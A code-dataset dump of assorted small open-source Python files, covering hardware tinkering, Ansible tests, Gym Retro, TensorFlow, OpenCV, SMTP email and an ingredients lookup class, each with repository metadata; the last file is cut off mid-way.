| 22.428571 | 99 | 0.56051 |
62786a1b62e28402836c7f170871c33f550107ef
| 4,015 |
py
|
Python
|
Gundlagen IT-Hardware/Aufgabe5u6.py
|
thieleju/studium
|
f23db7c7d2c30a2f0095cfdd25a4944c39d80d82
|
[
"MIT"
] | 2 |
2021-11-16T22:53:25.000Z
|
2021-11-17T12:30:49.000Z
|
Gundlagen IT-Hardware/Aufgabe5u6.py
|
thieleju/studium
|
f23db7c7d2c30a2f0095cfdd25a4944c39d80d82
|
[
"MIT"
] | 1 |
2022-02-23T18:56:51.000Z
|
2022-02-23T19:09:20.000Z
|
Gundlagen IT-Hardware/Aufgabe5u6.py
|
thieleju/studium
|
f23db7c7d2c30a2f0095cfdd25a4944c39d80d82
|
[
"MIT"
] | 1 |
2022-01-24T16:54:10.000Z
|
2022-01-24T16:54:10.000Z
|
#!/usr/bin/env python
import time
import explorerhat as hat
def decToBin(decimal):
binArray = [0] * 4
temp = decimal
if temp > 15 or temp < 0:
print("decimal out of bounds!")
return
# example: decimal = 5
# 1st iteration (i=3):
# binArray[3] = 5 % 2 = 1 -> [0, 0, 0, 1]
# temp = 5 / 2 = 2
# 2nd iteration (i=2):
# binArray[2] = 2 % 2 = 0 -> [0, 0, 0, 1]
# temp = 2 / 2 = 1
# 3rd iteration (i=1):
# binArray[1] = 1 % 2 = 1 -> [0, 1, 0, 1]
# temp = 1 / 2 = 0
# temp = 0 -> exit loop, binArray = [0, 1, 0, 1]
i = len(binArray) - 1 # 4-1 = 3
while temp > 0:
binArray[i] = temp % 2
temp //= 2 # double / is needed in python version 3 or greater, otherwise /= returns fractions
i -= 1
return binArray
def binToDec(binArray):
if len(binArray) > 4:
print("binArray too many elements")
return
# i is the index
# value is the value of the binArray[i]
# example: binArray = [0, 1, 0, 1] (5 in decimal)
# reverse array to [1, 0, 1, 0]
# 1st iteration (i=0):
# binArray[0] == 1 -> sum = 0 + 2^0 -> sum = 1
# 2nd iteration (i=1):
# binArray[1] == 1 -> false
# 3rd iteration (i=2):
# binArray[2] == 1 -> sum = 1 + 2^2 -> sum = 1 + 4 = 5
# 4th iteration (i=3):
# binArray[3] == 1 -> false
sum = 0
for i, value in enumerate(reversed(binArray)):
if value == 1:
sum += 2**i
return sum
def visualizeBinary(decimal):
arr = decToBin(decimal)
for i in range(4):
if arr[i] == 1:
hat.light[i].on()
elif arr[i] == 0:
hat.light[i].off()
def increaseCounter():
global counterInDec
global counterInBin
if counterInDec < 15:
counterInDec += 1
else:
counterInDec = 0
counterInBin = decToBin(counterInDec)
visualizeBinary(counterInDec)
def decreaseCounter():
global counterInDec
global counterInBin
if counterInDec > 0:
counterInDec -= 1
else:
counterInDec = 15
counterInBin = decToBin(counterInDec)
visualizeBinary(counterInDec)
def evaluateButtons(channel, event):
global nim
global counterInDec
global counterInBin
if event == 'press':
# toggle nim mode
if channel == 5:
nim = not nim
if nim == False:
# number input mode disabled
if channel == 6: # inc
increaseCounter()
if channel == 7: # dec
decreaseCounter()
if channel == 8: # reset
counterInBin = [0, 0, 0, 0]
counterInDec = 0
visualizeBinary(counterInDec)
elif nim == True:
# number input mode
if channel == 8:
nim = False
if channel <= 4:
# toggle bits
# example: button2 pressed(channel=2), binArray = [0, 0, 0, 1] (1 in decimal)
# -> counterInBin[2-1] = 1 - counterInBin[2-1]
# -> [0, 0, x, 1] is switched to...
# if x = 0: [0, 0, 0, 1] -> [0, 0, 1-0, 1] -> [0, 0, 1, 1]
# if x = 1: [0, 0, 1, 1] -> [0, 0, 1-1, 1] -> [0, 0, 0, 1]
counterInBin[channel-1] = 1 - counterInBin[channel-1]
# convert binary to decimal
counterInDec = binToDec(counterInBin)
# toggle lights on off
visualizeBinary(counterInDec)
print("Button Press on "+str(channel),
"NIM="+str(nim), counterInBin, counterInDec)
# Global variables
counterInDec = 0
counterInBin = [0, 0, 0, 0]
nim = False
hat.touch.pressed(evaluateButtons)
hat.pause()
| 27.689655 | 103 | 0.479452 |
b29c70a6632455a1a288439e0c8f3067a0014c9d
| 2,467 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/netvisor/test_pn_admin_session_timeout.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/netvisor/test_pn_admin_session_timeout.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/netvisor/test_pn_admin_session_timeout.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
# Copyright: (c) 2018, Pluribus Networks
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat.mock import patch
from ansible_collections.community.general.plugins.modules.network.netvisor import pn_admin_session_timeout
from ansible_collections.community.general.tests.unit.modules.utils import set_module_args
from ..nvos_module import TestNvosModule
class TestAdminServiceModule(TestNvosModule):
module = pn_admin_session_timeout
def setUp(self):
self.mock_run_nvos_commands = patch('ansible_collections.community.general.plugins.modules.network.netvisor.pn_admin_session_timeout.run_cli')
self.run_nvos_commands = self.mock_run_nvos_commands.start()
def tearDown(self):
self.mock_run_nvos_commands.stop()
def run_cli_patch(self, module, cli, state_map):
if state_map['update'] == 'admin-session-timeout-modify':
results = dict(
changed=True,
cli_cmd=cli
)
module.exit_json(**results)
def load_fixtures(self, commands=None, state=None, transport='cli'):
self.run_nvos_commands.side_effect = self.run_cli_patch
def test_admin_session_timeout_modify_t1(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_timeout': '61s',
'state': 'update'})
result = self.execute_module(changed=True, state='update')
expected_cmd = ' switch sw01 admin-session-timeout-modify timeout 61s'
self.assertEqual(result['cli_cmd'], expected_cmd)
def test_admin_session_timeout_modify_t2(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_timeout': '1d',
'state': 'update'})
result = self.execute_module(changed=True, state='update')
expected_cmd = ' switch sw01 admin-session-timeout-modify timeout 1d'
self.assertEqual(result['cli_cmd'], expected_cmd)
def test_admin_session_timeout_modify_t3(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_timeout': '10d20m3h15s',
'state': 'update'})
result = self.execute_module(changed=True, state='update')
expected_cmd = ' switch sw01 admin-session-timeout-modify timeout 10d20m3h15s'
self.assertEqual(result['cli_cmd'], expected_cmd)
| 44.854545 | 150 | 0.702878 |
0c161b64aac6b7eff8ff620e776c7c359b978c52
| 264 |
pyde
|
Python
|
sketches/runningorc00/runningorc00.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/runningorc00/runningorc00.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/runningorc00/runningorc00.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
# Running Orc 00
from orcs import Orc
orc = Orc(160, -48)
def setup():
global bg
bg = loadImage("field.png")
frameRate(15)
size(320, 320)
orc.loadPics()
orc.dy = 5
def draw():
background(bg)
orc.move()
orc.display()
| 13.894737 | 31 | 0.564394 |
a77fb80e23663e1e292fb097633fc97a5714a1ee
| 1,693 |
py
|
Python
|
retro/examples/discretizer.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 2,706 |
2018-04-05T18:28:50.000Z
|
2022-03-29T16:56:59.000Z
|
retro/examples/discretizer.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 242 |
2018-04-05T22:30:42.000Z
|
2022-03-19T01:55:11.000Z
|
retro/examples/discretizer.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 464 |
2018-04-05T19:10:34.000Z
|
2022-03-28T13:33:32.000Z
|
"""
Define discrete action spaces for Gym Retro environments with a limited set of button combos
"""
import gym
import numpy as np
import retro
class Discretizer(gym.ActionWrapper):
"""
Wrap a gym environment and make it use discrete actions.
Args:
combos: ordered list of lists of valid button combinations
"""
def __init__(self, env, combos):
super().__init__(env)
assert isinstance(env.action_space, gym.spaces.MultiBinary)
buttons = env.unwrapped.buttons
self._decode_discrete_action = []
for combo in combos:
arr = np.array([False] * env.action_space.n)
for button in combo:
arr[buttons.index(button)] = True
self._decode_discrete_action.append(arr)
self.action_space = gym.spaces.Discrete(len(self._decode_discrete_action))
def action(self, act):
return self._decode_discrete_action[act].copy()
class SonicDiscretizer(Discretizer):
"""
Use Sonic-specific discrete actions
based on https://github.com/openai/retro-baselines/blob/master/agents/sonic_util.py
"""
def __init__(self, env):
super().__init__(env=env, combos=[['LEFT'], ['RIGHT'], ['LEFT', 'DOWN'], ['RIGHT', 'DOWN'], ['DOWN'], ['DOWN', 'B'], ['B']])
def main():
env = retro.make(game='SonicTheHedgehog-Genesis', use_restricted_actions=retro.Actions.DISCRETE)
print('retro.Actions.DISCRETE action_space', env.action_space)
env.close()
env = retro.make(game='SonicTheHedgehog-Genesis')
env = SonicDiscretizer(env)
print('SonicDiscretizer action_space', env.action_space)
env.close()
if __name__ == '__main__':
main()
| 30.781818 | 132 | 0.666864 |
ac18b683582b4daad6d0ff2ebdf8853f6d365076
| 993 |
py
|
Python
|
Python/Exercícios_Python/060_criando_um_menu_de_opções.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/060_criando_um_menu_de_opções.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
Python/Exercícios_Python/060_criando_um_menu_de_opções.py
|
vdonoladev/aprendendo-programacao
|
83abbcd6701b2105903b28fd549738863418cfb8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""060 - Criando um Menu de Opções
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ZRWz8qDYyffRbOffElSZ19QOPh6WqCEY
"""
from time import sleep
v=0
op='4'
while v!=5:
while op=='4':
n1=int(input('Digite Um Valor: '))
n2=int(input('Digite Outro Valor: '))
op=0
print('=-='*20)
op=str(input('''[1] Somar
[2] Multiplicar
[3] Maior
[4] Novos Números
[5] Sair Do Progama '''))
if op=='1':
print('A soma entre {} e {} é {}'.format(n1,n2,n1+n2))
elif op=='2':
print('A multiplicação entre {} e {} é {}'.format(n1,n2,n1*n2))
elif op=='3':
if n1>n2:
print('{} é maior que {}'.format(n1,n2))
elif n1==n2:
print('Os números são iguais')
else:
print('{} é maior que {}'.format(n2,n1))
elif op=='4':
print('Escolha os novos números')
elif op=='5':
v=5
print('Finalizando...')
sleep(3)
print('Fim do progama.')
else:
print('Valor invalido, tente novamente.')
sleep(2)
| 22.568182 | 77 | 0.623364 |
021dd5fcb717d7088251e2734e9f274420db546a
| 677 |
py
|
Python
|
vorl5-ueb2.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb2.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
vorl5-ueb2.py
|
haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python
|
bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a
|
[
"MIT"
] | null | null | null |
# 5. Vorlesung 17.10.2020, Skript Python 4 (07_Python_04.pdf)
# Übung 2: Datei auslesen, Summen aus Artikel Anz und Einzelpreisen bilden
import re
muster = "(\d+),.*\s(\d+\.\d+)"
gesamtpreis = 0.0
qd = open("vorl5-ueb2-daten.txt","r")
for qdZeile in qd:
ergebnis = re.search(muster,qdZeile)
if ergebnis:
print("Gefunden: Artikelanzahl '"+ ergebnis.group(1)+"' und Einzelpreis '"+ ergebnis.group(2)+"'")
gesamtpreis = gesamtpreis + (float(ergebnis.group(1))*float(ergebnis.group(2)))
print("Zwischensumme: " + str(gesamtpreis))
else:
print("In dieser Zeile nichts gefunden!")
print("\n ==> Gesamtsumme = %.2f Euro" % gesamtpreis)
| 35.631579 | 106 | 0.655835 |
0c8488ca60dfe91b17ea2710a850c765a9d70947
| 1,421 |
py
|
Python
|
dmx/_open_dmx_usb.py
|
ihrigb/stagebuzzer
|
dbce1c5fa59a6f22e74d84ccc96d4d1a28a5b680
|
[
"Apache-2.0"
] | null | null | null |
dmx/_open_dmx_usb.py
|
ihrigb/stagebuzzer
|
dbce1c5fa59a6f22e74d84ccc96d4d1a28a5b680
|
[
"Apache-2.0"
] | null | null | null |
dmx/_open_dmx_usb.py
|
ihrigb/stagebuzzer
|
dbce1c5fa59a6f22e74d84ccc96d4d1a28a5b680
|
[
"Apache-2.0"
] | null | null | null |
import pyftdi.ftdi as ftdi
import threading
import time
vendor = 0x0403
product = 0x6001
class OpenDmxUsb(threading.Thread):
def __init__(self):
super().__init__()
self.baud_rate = 250000
self.data_bits = 8
self.stop_bits = 2
self.parity = 'N'
self.flow_ctrl = ''
self.rts_state = 0
self.channel_values = [0] * 513
self._init_dmx()
def _init_dmx(self):
self.ftdi = ftdi.Ftdi()
self.ftdi.open(vendor, product, 0)
self.ftdi.set_baudrate(self.baud_rate)
self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=False)
self.ftdi.set_flowctrl(self.flow_ctrl)
self.ftdi.purge_rx_buffer()
self.ftdi.purge_tx_buffer()
self.ftdi.set_rts(self.rts_state)
def _send_dmx(self):
self.ftdi.write_data(self.channel_values)
# Need to generate two bits for break
self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=True)
self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=True)
self.ftdi.set_line_property(self.data_bits, self.stop_bits, self.parity, break_=False)
def set_channel_values(self, channel_values):
self.channel_values = channel_values
def run(self) -> None:
while True:
self._send_dmx()
time.sleep(0.1)
| 31.577778 | 94 | 0.65658 |
0c9417ad4274665b9aa73b50e73eb6c1a590c595
| 334 |
py
|
Python
|
musterloesungen/2.1/summe.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
musterloesungen/2.1/summe.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
musterloesungen/2.1/summe.py
|
giu/appe6-uzh-hs2018
|
204dea36be1e53594124b606cdfa044368e54726
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Kurs: Python: Grundlagen der Programmierung für Nicht-Informatiker
# Semester: Herbstsemester 2018
# Homepage: http://accaputo.ch/kurs/python-uzh-hs-2018/
# Author: Giuseppe Accaputo
# Aufgabe: 2.1
def summe(a,b,c):
print(a + b + c)
summe(1,2,3)
summe(1,-1,0)
summe(-1,-2,-3)
| 25.692308 | 76 | 0.622754 |
3306f16c49c2cdaedf84bb05719c3ac529a7ef39
| 329 |
py
|
Python
|
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/catalog/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/catalog/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
marsyas-vamp/marsyas/src/django/birdsong/application/birdsong/catalog/models.py
|
jaouahbi/VampPlugins
|
27c2248d1c717417fe4d448cdfb4cb882a8a336a
|
[
"Apache-2.0"
] | null | null | null |
from django.db import models
class Call(models.Model):
name = models.CharField(max_length=200)
matriline = models.CharField(max_length=200)
notes = models.CharField(max_length=200)
audio = models.CharField(max_length=200)
image = models.CharField(max_length=200)
duration = models.FloatField()
| 27.416667 | 48 | 0.717325 |
cc0b35c25b24c4a0e734c8f4bfed79081cf6f7e0
| 720 |
py
|
Python
|
Python/Topics/Sending-Email/06-html-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Python/Topics/Sending-Email/06-html-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Python/Topics/Sending-Email/06-html-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
import smtplib
import os
from email.message import EmailMessage
EMAIL_ADDRESS = os.environ.get("GMAIL_ADDRESS")
EMAIL_PASSWORD = os.environ.get("GMAIL_APP_PASS")
with smtplib.SMTP_SSL("smtp.gmail.com", 465) as smtp:
smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
reciver = "[email protected]"
msg = EmailMessage()
msg["Subject"] = "Grab dinner this weekend? 2"
msg["From"] = EMAIL_ADDRESS
msg["To"] = reciver
msg.set_content("This is plain text")
msg.add_alternative("""\
<!DOCTYPE html>
<html>
<body>
<h1 style="color:SlateGray;">This is an HTML Email!</h1>
</body>
</html>
""", subtype="html")
smtp.send_message(msg)
print(f"Email was sented to {reciver}")
| 24 | 64 | 0.676389 |
c5798f983ff9c01735215a9490ff8227cd6dca70
| 2,781 |
py
|
Python
|
Chapter5_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py
|
thisisjako/UdemyTF
|
ee4102391ed6bd50f764955f732f5740425a9209
|
[
"MIT"
] | null | null | null |
Chapter5_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py
|
thisisjako/UdemyTF
|
ee4102391ed6bd50f764955f732f5740425a9209
|
[
"MIT"
] | null | null | null |
Chapter5_DNN/Chapter5_6_NeuralNetworkMath/gradientsAndGraph.py
|
thisisjako/UdemyTF
|
ee4102391ed6bd50f764955f732f5740425a9209
|
[
"MIT"
] | null | null | null |
import os
from typing import List
from typing import Tuple
import numpy as np
import tensorflow as tf
from tensorflow.keras.callbacks import TensorBoard
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Dense
from tensorflow.keras.losses import MeanSquaredError
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import Adam
LOGS_DIR = os.path.abspath("C:/Users/Jan/Dropbox/_Programmieren/UdemyTF/logs/computation/")
MODEL_LOG_DIR = os.path.join(LOGS_DIR, "gradient_model")
def get_dataset() -> Tuple[np.ndarray, np.ndarray]:
x = np.array(
[[i, i] for i in range(100)],
dtype=np.float32
)
y = np.array(
[i for i in range(100)],
dtype=np.float32
).reshape(-1, 1)
return x, y
def build_model() -> Sequential:
model = Sequential()
model.add(Dense(1, input_shape=(2,), name="hidden"))
model.add(Activation("relu", name="relu"))
model.add(Dense(1, name="output"))
model.summary()
return model
def get_gradients(
x_test: np.ndarray,
y_test: np.ndarray,
model: Sequential,
loss_object: tf.keras.losses.Loss
) -> List[Tuple[np.ndarray, np.ndarray]]:
with tf.GradientTape() as tape:
y_pred = model(x_test, training=True)
loss_value = loss_object(y_test, y_pred)
grads = tape.gradient(loss_value, model.trainable_variables)
grad_var_tuples = [
(g, w) for (g, w) in zip(grads, model.trainable_variables)
]
return grad_var_tuples
if __name__ == "__main__":
x, y = get_dataset()
model = build_model()
model.compile(
loss="mse",
optimizer=Adam(learning_rate=1e-2),
metrics=["mse"]
)
tb_callback = TensorBoard(
log_dir=MODEL_LOG_DIR,
embeddings_freq=0,
write_graph=True
)
model.fit(
x=x,
y=y,
verbose=1,
batch_size=1,
epochs=0,
callbacks=[tb_callback]
)
model.layers[0].set_weights(
[np.array([[-0.250], [1.000]]),
np.array([0.100])]
)
model.layers[2].set_weights(
[np.array([[1.250]]),
np.array([0.125])]
)
###############
### TESTING ###
###############
loss_object = MeanSquaredError()
x_test = np.array([[2, 2]])
y_test = np.array([[2]])
y_pred = model.predict(x_test)
print(f"Pred: {y_pred}")
layer_names = [
"hidden:kernel"
"hidden:bias",
"output:kernel",
"output:bias"
]
gradients = get_gradients(x_test, y_test, model, loss_object)
for name, (grads, weight) in zip(layer_names, gradients):
print(f"Name:\n{name}")
print(f"Weights:\n{weight.numpy()}")
print(f"Grads:\n{grads.numpy()}\n")
| 24.394737 | 91 | 0.613448 |
c59aa30ad222e8bde6175ed308b47d9288d6f8c9
| 484 |
pyde
|
Python
|
sketches/aquarium/aquarium.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/aquarium/aquarium.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/aquarium/aquarium.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
from fish import Fish
WIDTH = 640
HEIGHT = 416
NFISHES = 15 # Anzahl der Fische
FPS = 60
fishes = []
def setup():
global bg
size(WIDTH, HEIGHT)
this.surface.setTitle(u"Jörgs kleines, bonbonbuntes Aquarium")
bg = loadImage("background.png")
for _ in range(NFISHES):
fishes.append(Fish())
frameRate(FPS)
def draw():
background(49, 197, 224) # Himmelblau
image(bg, 0, 0)
for fish in fishes:
fish.show()
fish.update()
| 18.615385 | 66 | 0.619835 |
c5e2383a33736e97cabae7f5d8ed6150518462ce
| 506 |
py
|
Python
|
source/pkgsrc/devel/gyp/patches/patch-gyptest.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-11-20T22:46:39.000Z
|
2021-11-20T22:46:39.000Z
|
source/pkgsrc/devel/gyp/patches/patch-gyptest.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
source/pkgsrc/devel/gyp/patches/patch-gyptest.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | null | null | null |
$NetBSD: patch-gyptest.py,v 1.4 2014/08/21 14:49:43 he Exp $
* Add NetBSD 5, 6 and 7 target
--- gyptest.py.orig 2014-07-14 14:19:50.000000000 +0000
+++ gyptest.py
@@ -219,6 +219,10 @@ def main(argv=None):
'aix5': ['make'],
'freebsd7': ['make'],
'freebsd8': ['make'],
+ 'freebsd9': ['make'],
+ 'netbsd5': ['make'],
+ 'netbsd6': ['make'],
+ 'netbsd7': ['make'],
'openbsd5': ['make'],
'cygwin': ['msvs'],
'win32': ['msvs', 'ninja'],
| 28.111111 | 60 | 0.492095 |
76af98358bbb121804e0ab09430a0eac30ea0567
| 441 |
py
|
Python
|
python/image_processing/perspective_tr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/image_processing/perspective_tr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/image_processing/perspective_tr.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('city1.jpg')
rows,cols,ch = img.shape
pts1 = np.float32([[56,65],[368,52],[28,387],[389,390]])
pts2 = np.float32([[0,0],[300,0],[0,300],[300,300]])
M = cv2.getPerspectiveTransform(pts1,pts2)
dst = cv2.warpPerspective(img,M,(300,300))
plt.subplot(121),plt.imshow(img),plt.title('Input')
plt.subplot(122),plt.imshow(dst),plt.title('Output')
plt.show()
| 22.05 | 56 | 0.69161 |
4ff3b6b59836604f755980cd03adae455ffef034
| 10,665 |
py
|
Python
|
ingrediens.py
|
ChristianKitte/Textextraktion-und-Einordnung-mit-Hilfe-neuronaler-Netze
|
53d3fc6b1c17f31146741cdebd743f4aa12a09e0
|
[
"MIT"
] | null | null | null |
ingrediens.py
|
ChristianKitte/Textextraktion-und-Einordnung-mit-Hilfe-neuronaler-Netze
|
53d3fc6b1c17f31146741cdebd743f4aa12a09e0
|
[
"MIT"
] | 16 |
2020-01-28T23:04:13.000Z
|
2022-03-12T00:02:40.000Z
|
ingrediens.py
|
ChristianKitte/Textextraktion-und-Einordnung-mit-Hilfe-neuronaler-Netze
|
53d3fc6b1c17f31146741cdebd743f4aa12a09e0
|
[
"MIT"
] | null | null | null |
import json
import pandas as pd
class Ingredients():
"""The Ingrediens class contains a list of ingredients and provides access to them. It provides
functionality to search the list of substances using a search term.
If it is generated manually, a list of ingredients can be transferred to it. A JSON file is then
not necessary.
If it is created using the instance method, it is based on the JSON file defined in json_path.
The static convert method can be used to convert an Excel file corresponding to the requirements
into a JSON file. Requirements are: Sheet 1, start at A1 (header): ID, E-Nr, ingrediens (comma separated),
remark, annotation, classification, keywords (comma separated)
An ingredient represents a list with the properties specified here:
ingredient_new = [id, e_number, ingrediens_list, remark, annotation, classification, keywords_list]"""
def __init__(self, items=[], usePatch=True):
"""The constructor. A list of ingredients can be passed as an optional argument.
ingredient_new = [id, e_number, ingrediens_list, remark, annotation, classification, keywords_list].
:param items:An optional list of items to add.
:param usePatch:If true, special characters contained in search words are converted to normal
letters (e.g. ö -> o)
"""
try:
self.usePatch = usePatch
self.items = items
self.search_items = {}
except:
print('Error in method {0} in module {1}'.format('init', 'ingrediens.py'))
@staticmethod
def instance(json_path, usePatch=True):
"""Returns a new instance of the Ingrediens class based on the JSON file named in json_path.
:param json_path:The path to the Json file that serves as the database.
:param usePatch:If true, special characters contained in search words are converted to normal
letters (e.g. ö -> o).
:return:An instance of the class Ingridiens.
"""
try:
with open(json_path, mode='r', encoding='utf-8') as json_file:
json_data = json.load(json_file)
ingrediens = Ingredients(json_data['items'], usePatch)
ingrediens.update()
return ingrediens
except:
print('Error in method {0} in module {1}'.format('instance', 'ingrediens.py'))
return None
@staticmethod
def convert(excel_path, json_path):
"""A static method which converts an Excel file specified in excel_path to the JSON file defined by json_path.
:param excel_path:The excel path.
:param json_path:The json path.
"""
try:
raw = pd.read_excel(excel_path)
ingrediens_data = Ingredients()
for x in raw.values:
id = x[0]
e_number = str(x[1]).strip()
ingrediens = str(x[2]).split(',')
ingrediens_list = [x.strip() for x in ingrediens]
remark = str(x[3])
annotation = str(x[4])
classification = str(x[5])
keywords = str(x[6]).split(',')
keywords_list = [x.strip() for x in keywords]
ingredient_new = [id, e_number, ingrediens_list, remark, annotation, classification, keywords_list]
ingrediens_data.add(ingredient_new)
ingrediens_data.update()
with open(json_path, mode='w', encoding='utf-8') as json_file:
json.dump(ingrediens_data.__dict__, json_file, ensure_ascii=False)
except:
print('Error in method {0} in module {1}'.format('convert', 'ingrediens.py'))
def __iter__(self):
"""Returns an iterator for the list of ingredients.
:return:An iterator.
"""
try:
return self
except:
print('Error in method {0} in module {1}'.format('iter', 'ingrediens.py'))
return None
def next(self):
"""Goes through the list of ingredients (Generator).
:return:The next Item
"""
try:
for item in self.items:
yield item
except:
print('Error in method {0} in module {1}'.format('next', 'ingrediens.py'))
return None
def add(self, item):
"""Adds a new ingredient to the list of ingredients.
ingredient_new = [id, e_number, ingrediens_list, remark, annotation, classification, keywords_list].
:param item:The element to be added.
"""
try:
self.items.append(item)
except:
print('Error in method {0} in module {1}'.format('add', 'ingrediens.py'))
def contains(self, item):
"""Returns True and the ID of an ingredient if the transfer item could be assigned to a substance.
Otherwise, False and -1 are returned.
During preprocessing, the search string is converted to lowercase letters and all spaces are removed.
:param item:The element (searchstring) for which a check is to be made.
:return:True and the ID if exists, otherwise False.
"""
try:
item = item.lower()
item = str(item).replace(' ', '')
if self.usePatch == True:
item = self.replaceChar(item)
if item in self.search_items:
id = self.search_items[item]
return True, id
else:
return False, -1
except:
print('Error in method {0} in module {1}'.format('contains', 'ingrediens.py'))
return None
def replaceChar(self, item):
"""Replaces the special characters ü, ö, ä with u, o, a
:param item:The element (searchstring) for which a check is to be made.
:return:The item with the replacements
"""
try:
str(item).replace("ö", "o")
str(item).replace("ä", "a")
str(item).replace("ü", "u")
return item
except:
print('Error in method {0} in module {1}'.format('replaceChar', 'ingrediens.py'))
return None
def replaceChar_in_String(self, item):
"""Searches the passed word for the letters ä, ö, ü.
:param item:The word to analyze
:return:True, if one of the umlauts was found
"""
try:
search_list = ["ä", "ö", "ü"]
for x in search_list:
if item.find(x):
return True
return False
except:
print('Error in method {0} in module {1}'.format('replaceChar_in_String', 'ingrediens.py'))
return None
def get_item(self, id):
"""Returns an ingredient based on the ID of the substance.
